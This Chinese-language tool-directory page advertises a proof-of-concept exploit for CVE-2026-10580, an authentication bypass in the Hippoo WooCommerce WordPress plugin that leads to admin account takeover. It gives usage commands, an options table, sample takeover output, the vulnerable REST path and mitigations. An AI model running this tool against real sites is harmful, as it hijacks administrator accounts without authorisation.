Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10580 — CVE-2026-10580的PoC漏洞利用 - Hippoo移动应用(WooCommerce <= 1.9.4)中的身份验证绕过,导致管理员账户接管 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
身份验证与授权密码攻击漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

CVE-2026-10580的PoC漏洞利用 - Hippoo移动应用(WooCommerce <= 1.9.4)中的身份验证绕过,导致管理员账户接管

查看仓库
42个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - 认证绕过导致管理员账户接管

License: MIT

概述

本工具是 CVE-2026-10580 的概念验证漏洞利用程序,该漏洞影响 Hippoo Mobile App for WooCommerce WordPress 插件(版本 <= 1.9.4)。该漏洞允许未经身份验证的攻击者重置任何用户(包括管理员)的密码,从而完全接管站点。

⚠️ 重要提示: 本工具仅用于 授权的安全测试和教育目的。未经授权对您不拥有或未获得明确许可的系统使用是违法的。

功能

  • 通过易受攻击的 REST API 端点枚举所有 WordPress 用户
  • 重置指定用户 ID(默认:管理员 ID 1)的密码
  • 简洁的命令行界面,带彩色输出
  • 可选择禁用 SSL 验证以用于测试环境

使用方法

前提条件

  • Python 3.6+
  • requests 库

安装依赖:

root@kitploit:~
pip install requests

基本命令

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

选项

示例

使用默认管理员 ID (1) 并启用 SSL 验证进行利用:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

针对特定用户 ID 并禁用 SSL 验证:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

不带横幅运行:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

示例输出

root@kitploit:~
[+] 发现 3 个用户
    - 用户 ID: 1 | 用户名: admin | 角色: administrator
    - 用户 ID: 2 | 用户名: editor_user | 角色: editor
    - 用户 ID: 3 | 用户名: subscriber1 | 角色: subscriber

╔══════════════════════════════════════════════════════════════╗
║             管理员账户接管成功                                 ║
╚══════════════════════════════════════════════════════════════╝
    目标: https://example.com
    登录: https://example.com/wp-admin
    用户名: admin
    密码: PwnedCVE2026!!

缓解措施

如果您正在使用 Hippoo 插件,请立即更新到已修补的版本(>1.9.4)。此外:

  • 定期审计用户账户是否存在未经授权的更改
  • 监控日志中是否有意外的 API 请求至 /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • 如果不需要,考虑限制对 WordPress REST API 的访问

许可证

本项目基于 MIT 许可证 授权。详情请参见 LICENSE 文件。

作者

0xgh057r3c0n

免责声明

作者不对本工具的任何滥用负责。请负责任地使用,并且仅用于您拥有或获得明确许可测试的系统。

下载工具
参数描述
-t, --target目标 WordPress 站点 URL(例如 https://example.com)
-p, --password要为管理员账户设置的新密码
-i, --id要接管的用户 ID(默认:1)
-k, --insecure跳过 SSL 证书验证
--no-banner隐藏 ASCII 横幅